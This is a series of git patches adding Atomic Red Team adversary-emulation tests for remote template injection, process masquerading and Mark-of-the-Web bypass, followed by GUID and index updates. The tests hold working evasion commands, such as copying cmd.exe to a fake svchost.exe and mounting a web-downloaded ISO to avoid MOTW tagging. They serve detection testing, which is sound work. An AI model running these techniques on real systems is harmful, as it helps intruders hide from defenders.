## Atomic Test #1 - WINWORD Remote Template Injection -Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off. +Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm +Executes the code specified within the .dotm template. +Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. +Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows @@ -26,15 +29,14 @@ Open a .docx file that loads a remote .dotm macro enabled template. Executes the #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| docx file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| -| dotm template | Location of the test dotm template on the remote server. | Path | https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm| +| docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| #### Attack Commands: Run with `command_prompt`! ```cmd -start PathToAtomicsFolder\T1221\src\Calculator.docx +start #{docx_file} ``` From 3ae4d98bb8ed941503f6be3bb07e582b8bd1e832 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Tue, 8 Jun 2021 18:05:29 -0600 Subject: [PATCH 08/35] Added 2 tests for T1036.005 One Windows and one Linux/macOS --- atomics/T1036.005/T1036.005.yaml | 51 ++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 atomics/T1036.005/T1036.005.yaml diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml new file mode 100644 index 00000000..05a1bdd7 --- /dev/null +++ b/atomics/T1036.005/T1036.005.yaml @@ -0,0 +1,51 @@ +--- +attack_technique: T1036.005 +display_name: 'Masquerading: Match Legitimate Name or Location' + +atomic_tests: +- name: Execute a process from a directory masquerading as the current parent directory. + description: | + Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + + supported_platforms: + - macos + - linux + + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#1 + + executor: + name: sh + elevation_required: false + command: | + mkdir $HOME/... + cp $(which sh) $HOME/... + $HOME/.../sh -c "echo #{test_message}" + cleanup_command: | + rm -f $HOME/.../sh + rmdir $HOME/.../ + +- name: Execute a process masquerading as a legitimate Windows binary + description: | + Create and execute a process masquerading as a legitimate Windows binary + + supported_platforms: + - windows + + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#2 + + executor: + name: command_prompt + elevation_required: false + command: | + copy %WINDIR%\System32\cmd.exe /Y %PUBLIC%\svchost.exe + start %PUBLIC%\svchost.exe /C echo "#{test_message}" + cleanup_command: | + del %PUBLIC%\svchost.exe >nul 2>&1 From d3321c6a1f00e3c77b37ddc09e23749791ccbc7d Mon Sep 17 00:00:00 2001 From: Jorge Orchilles <52384511+jorgeorchilles@users.noreply.github.com> Date: Wed, 9 Jun 2021 11:40:30 -0700 Subject: [PATCH 09/35] Create T1553.005 Atomic Test (#1506) * Create T1553.005 * Create T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Updated T1553.005 --- atomics/T1553.005/T1553.005.md | 51 ++++++++++++++++++++++++++++ atomics/T1553.005/T1553.005.yaml | 29 ++++++++++++++++ atomics/T1553.005/src/T1553.005.iso | Bin 0 -> 360448 bytes 3 files changed, 80 insertions(+) create mode 100644 atomics/T1553.005/T1553.005.md create mode 100644 atomics/T1553.005/T1553.005.yaml create mode 100644 atomics/T1553.005/src/T1553.005.iso diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md new file mode 100644 index 00000000..50d47c77 --- /dev/null +++ b/atomics/T1553.005/T1553.005.md @@ -0,0 +1,51 @@ +# T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005/) +
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
+ +## Atomic Tests + +- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image---) + + +
+ +## Atomic Test #1 - Mount ISO image +Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\src\T1553.005.iso| + + +#### Attack Commands: Run with `powershell`! + + +``` Mount-DiskImage -ImagePath "#{path_of_iso}"``` + +#### Cleanup Commands: +``` Dismount-DiskImage -ImagePath "#{path_of_iso}"``` + + + +#### Dependencies: Run with `powershell`! +##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) +##### Check Prereq Commands: +``` +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" +``` + + + + +
diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml new file mode 100644 index 00000000..fe4879b8 --- /dev/null +++ b/atomics/T1553.005/T1553.005.yaml @@ -0,0 +1,29 @@ +attack_technique: T1553.005 +display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass' +atomic_tests: +- name: Mount ISO image + description: | + Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + dependency_executor_name: powershell + dependencies: + - description: | + T1553.005.iso must exist on disk at specified location (#{path_of_iso}) + prereq_command: | + if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + executor: + command: | + Mount-DiskImage -ImagePath "#{path_of_iso}" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" + name: powershell + diff --git a/atomics/T1553.005/src/T1553.005.iso b/atomics/T1553.005/src/T1553.005.iso new file mode 100644 index 0000000000000000000000000000000000000000..5f01ec95159292996ea615bde8feb9af3a411d1b GIT binary patch literal 360448 zcmeI)U5s2+0RZ4L73fj~7pSGJ2p3`nB0HVkwS|^ox}BNrPT8GVW@ZZ|gR)^4tj_L` zovm$+55*S*G3g6vV$=pf9z-HWLc(7#5)FeKo-jQW##k77R{7(fYZYtF(qqQV%H*MUQTR%2h zTR&A8O-4)O#oEqVy*QC;L;;D270Q009C7 z2%IK?cn6o%ch4rH(S#)?Z(lP*8GC%1E)XCBt6y* zOPw4eS=F`pSU2hPw^Ue4fB*pk1m1grV)bxlMg6{bRV__^E-t?w9I1~LlWHY@Q&KGz zwiT07xn8X1$41IAKUuBREBVTJn%Pk*6l+OsYBIe*CZlly_hhA3y0x?PJL#?ct`#Rn z%JovdHaT7#sTGrarCcA$*ONl2mQN<9wvLx-V{vJCTDdk^%$G(>`H_05Qch}>scOEM zO_EwM_Ik8n>@qetT8ec_W+ByS6li*67w$)6wZ3>szaG)zc%oP74<`z^A3)7 z_QUE-_)vWP#QWT0W@Wg1^7YCq$)7gw>VM?7ec@BN+;`T5^>L+Ox9Q`yJHlXR|HeKuCLv3GsadvKaD1@!YwY#;`?%5Z-Q@dYpF3Z%yzS!Pkm<@AbIK=8< zb+{`{!@>ffG7M}7OX|AusQ@PEDPqOcHl zcShX|%}(pt*w5Y=L%1}?N-s^Tr27LgrlB0;g)yeBzWwsApYM-ph_pSq#?o9H#}DnA zkd1$hci0|}*9a$0x^c>ZCLtd-$2L!Fp?v~dBfdRzVLIF$C$|t|JC0%|PP!S=!Ji$% z!F4hHeT?Zu&x`we%0FBC$7Q#dpDARYdh+IPJ(Iq6M~rdO2XBpO8osov)tp`I=F{z? zuUB6D%i1-C?=Sz#Z4V9XuU-Dww?FfXpT2S7vtNFD&*JxXe&XF;Ul|*ZkADuX>k3v| zt;KbXcJGtZ*flqO_w2%KI~(8bV||{fxpl{V3aaso)rwz(b@9Fa&)?fK)#igVujk^~ z=iK<6n2VDhtWDMq=U#X%AMW4w_}^c-_|f)VSKb_t&!ixi_hKP_Q0|Q9wYm5;pN}7z zc1Xh2z0<^0+)GaY?f5Yo@06R4r+}rS*QCvK!hyI=JIlSb?wL2Yt?hs8tz~yS_}w?2 zxFR0!{778dS^86O)!5uUv7v=dMJ=oK-zM82J4;;mnQVi(`O);hrPpz6O{OB9^j6FWKCHv@&dmsFG zJpTE#z*vm`*njEb&%gQbwntvQ{_s;Pwx6FK7YGm_K!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 W2oNAZfB*pk1PBlyK!CspLf~I%UTI4J literal 0 HcmV?d00001 From b74fd6246cf6970c76d13994bf1200a3b510ce46 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 9 Jun 2021 18:40:57 +0000 Subject: [PATCH 10/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1553.005/T1553.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index fe4879b8..000674c5 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -2,6 +2,7 @@ attack_technique: T1553.005 display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass' atomic_tests: - name: Mount ISO image + auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa description: | Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 71c27abf..3e4f1628 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -710,3 +710,4 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a 126f71af-e1c9-405c-94ef-26a47b16c102 da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 +002cca30-4778-4891-878a-aaffcfa502fa From 22f3da49600f402eb910a71b6c05977a7e8fb36d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 18:41:04 +0000 Subject: [PATCH 11/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 37 ++++++++++++++++++- atomics/T1553.005/T1553.005.md | 22 +++++++---- 10 files changed, 60 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 9934245a..94952e5e 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"